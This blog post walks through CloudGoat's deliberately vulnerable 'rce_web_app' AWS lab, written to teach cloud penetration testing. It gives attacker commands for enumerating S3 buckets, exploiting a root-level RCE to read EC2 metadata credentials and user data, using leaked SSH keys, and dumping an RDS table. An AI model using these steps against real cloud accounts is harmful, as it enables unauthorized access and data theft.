CloudGoat walkthrough series: Remote code execution

January 28, 2021 by Mosimilolu Odusanya

This is the sixth in our walkthrough series of CloudGoat scenarios. CloudGoat is a “vulnerable by design” AWS deployment tool created by Rhino Security Labs. It deploys a deliberately vulnerable set of AWS resources and is meant to teach and test cloud security penetration testing via issues commonly seen in real-life environments.

This walkthrough assumes you have CloudGoat set up on your Kali Linux machine. You can use our post (Working with CloudGoat: The “vulnerable by design” AWS environment) as a guide to deploying it.

Scenario summary

Starting as the IAM user Lara, the attacker explores a load balancer and S3 bucket for clues to vulnerabilities. This leads to an RCE exploit on a vulnerable web app, which exposes confidential files and culminates in access to the scenario’s goal: a highly secured RDS database instance.

Alternatively, the attacker may start as the IAM user McDuck and enumerate S3 buckets, eventually leading to SSH keys that grant direct access to the EC2 server and the database beyond.

Based on the scenario summary, we can tell that there are two IAM users and that both paths lead to the same goal.

Goal: Gain access to sensitive information stored in the RDS database instance.

Walkthrough

To deploy the resources for each scenario on AWS:

./cloudgoat.py create rce_web_app

Deploying the resources gives us the access key and secret key for Lara and McDuck.

Lara’s path

1. Save the credentials to a profile named Lara.

aws configure --profile Lara

2. Perform reconnaissance on the user “Lara” to see what privileges the user has. You can do this by enumerating the policies and permissions attached to the user.

We tried running the usual commands: "list-user-policies", "list-attached-user-policies" and "list-roles". We found we were not authorized to carry out those actions. The calls we attempted are sketched below.
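For reference, the enumeration attempts looked something like the following (the IAM user name is a placeholder; substitute whatever name the deployment generated for Lara):

aws iam list-user-policies --user-name <insert Lara's user name here> --profile Lara

aws iam list-attached-user-policies --user-name <insert Lara's user name here> --profile Lara

aws iam list-roles --profile Lara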

3. Since we are unable to get more information about Lara, we perform recon on the S3 buckets. We notice that Lara has permission to list buckets.

aws s3 ls --profile <insert profile name here>

4. We notice three buckets. We try to access all three buckets to see what information they contain. We are not authorized to access two of the three buckets. The last bucket seems to contain the logs of an AWS service.

aws s3 ls <insert s3 bucket name here> --profile <insert profile name here>

5. Exploring the log folder reveals that it contains the logs of an elastic load balancer. We download the log file and analyze it.

aws s3 ls s3://<insert s3 bucket name here> --recursive --profile <insert profile name here>

aws s3 cp s3://<insert s3 bucket name here>/<insert log file name here> ./<insert new file name here>.txt --profile <insert profile name here>

6. Opening the log file reveals it is an HTTP log file. However, it is not easy to read.

There are two ways to analyze this log file.

1. Using grep to find and extract URLs from the log file.

cat <insert file name here> | grep -Eo '(http|https)://[a-zA-Z0-9./?=_%:-]*'

2. Using an ELB log analyzer: I found this log analyzer for AWS Elastic Load Balancer by Ozantunca on GitHub and installed it.

elb-log-analyzer <insert log name here>

We try accessing the webpage directly, as it appears many times in the ELB logs, but it is unavailable. A quick check is sketched below.
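A simple reachability check from the terminal (the URL placeholder stands in for the address extracted from the logs):

curl -I http://<insert URL from the log file here>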

7. We try to identify whether there’s a load balancer or EC2 instance deployed and if we have access to it.

aws elb describe-load-balancers --region us-east-1 --profile <insert profile name here>

We are also not sure what kind of elastic load balancer is deployed to the environment. We assume it’s an application load balancer, since we have a web server deployed on the EC2 instance (port 80 is enabled on the server).

aws elbv2 describe-load-balancers --region us-east-1 --profile <insert profile name here>

8. Let’s visit the DNS name of the elastic load balancer, returned by describe-load-balancers. It references a secret URL.

9. Remember the .html webpage identified in the ELB log file? We try accessing it via the load balancer’s DNS name.

10. We try different commands on the page. We note that it has a remote code execution vulnerability and that the commands run as root. A few probes are sketched below.
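For example, basic probes like these confirm code execution and reveal the effective user (assuming the page passes its input to a shell):

whoami

id

uname -a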

With this, we query the instance metadata API to reveal the role name attached to the EC2 instance and obtain its temporary credentials. The instance metadata contains data about the EC2 instance that you can use to configure or manage the running instance.
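Assuming the RCE lets us run curl, the metadata service (IMDSv1) can be queried like this; the role name placeholder is whatever the first request returns:

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<insert role name here>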

We also query the user data to see whether any user data was specified during the creation of the EC2 instance.
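User data is exposed through the same metadata service:

curl http://169.254.169.254/latest/user-data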

The user data contains commands and credentials for the RDS instance (which holds a table named “sensitive_information”). We try connecting to the RDS instance to see what happens.
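Connecting from the compromised instance might look like the following sketch; it assumes the psql client is available on the instance and uses the connection details recovered from the user data:

psql postgresql://<username>:<password>@<address of the RDS instance>:5432/<DB name> -c 'SELECT * FROM sensitive_information;'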

McDuck’s path

1. Save the credentials to a profile named McDuck.

aws configure --profile McDuck

2. Perform reconnaissance on the user “McDuck” to see what privileges the user has by enumerating the policies and permissions attached to the user.

We tried running the usual commands, "list-user-policies", "list-attached-user-policies" and "list-roles" (the same calls shown in Lara's path, this time with --profile McDuck). Again, we were not authorized to carry out those actions.

3. Since we are unable to get more information about the user and any assigned roles, we perform recon on the S3 buckets and notice that McDuck has permission to list buckets.

aws s3 ls --profile <insert profile name here>

4. We notice three S3 buckets. We try to access all three S3 buckets to see what information they contain. We are unauthorized to access two of the three buckets.

aws s3 ls <insert s3 bucket name here> --profile <insert profile name here>

5. We have access to the keystore bucket, which contains SSH keys. We download the files to our system.

aws s3 cp s3://<insert s3 bucket name here> ./ --recursive --profile <insert profile name here>

6. We try to identify whether there is a load balancer or EC2 instance deployed and whether we have access to it. It’s the same EC2 instance and load balancer identified in Lara’s path, but this time we have an SSH key for the EC2 instance, so we try connecting to it. First we need the instance’s public IP address, and then we need to lock down the SSH key’s permissions.
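One way to retrieve the public IP is to describe the EC2 instances; whether McDuck is authorized to make this call is an assumption here:

aws ec2 describe-instances --region us-east-1 --profile McDuck

With the IP in hand, restrict the key’s permissions: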

chmod 700 cloudgoat

7. Using the key pair, we log in to the EC2 instance.

ssh -i cloudgoat ubuntu@<insert public IP of the EC2 Instance here>

8. Install the AWS CLI on the instance.

sudo apt-get install awscli

9. Try accessing the S3 buckets again to see if we have permission. With no credentials configured on the instance, the AWS CLI falls back to the role attached to the EC2 instance profile, so this tests that role’s permissions.

aws s3 ls

10. We have access to the last S3 bucket and it contains a file called “db.txt”.

aws s3 ls s3://<insert s3 bucket name here>

11. Download the file to our system.

aws s3 cp s3://<insert s3 bucket name here>/<insert file name here> .

We open the file to see what it contains.

cat <insert file name here>

We have the same credentials to the RDS instance from Lara’s path.

12. We try connecting to the RDS instance using these credentials, but first we need the address of the RDS instance.

aws rds describe-db-instances --region us-east-1

13. Connect to the RDS Instance.

psql postgresql://<username>:<password>@<address of the RDS instance>:5432/<DB name>

14. List the tables in the RDS Instance.

\dt

15. List the content of the table “sensitive_information”.

SELECT * FROM sensitive_information;

To destroy the resources created during this lab:

./cloudgoat.py destroy rce_web_app

Summary

In this scenario, we were able to exploit a number of misconfigurations and bad practices to gain access to the sensitive data.

  1. Access to the elastic load balancer log files, which led us to the secret URL. Access to logs should be restricted on a need-to-know basis.
  2. A remote code execution vulnerability in the web application, which allowed us to run commands on the EC2 instance as root, granting us access to sensitive information.
  3. Access to the user data of the EC2 instance, which exposed the credentials to the RDS instance.
  4. SSH keys stored in an S3 bucket, which we used to gain access to the EC2 instance.
  5. Credentials (username and password) to the RDS instance stored in a plaintext file in an S3 bucket.

Sources

AWS CLI Command Reference - IAM, AWS

Well, that escalated quickly, Bishop Fox

AWS IAM Privilege Escalation Methods, Rhino Security Labs

ELB Log Analyzer, GitHub

Mosimilolu Odusanya

Mosimilolu (or 'Simi') works as a full-time cybersecurity consultant, specializing in privacy and infrastructure security. Outside of work, her passions include watching anime and TV shows, and travelling.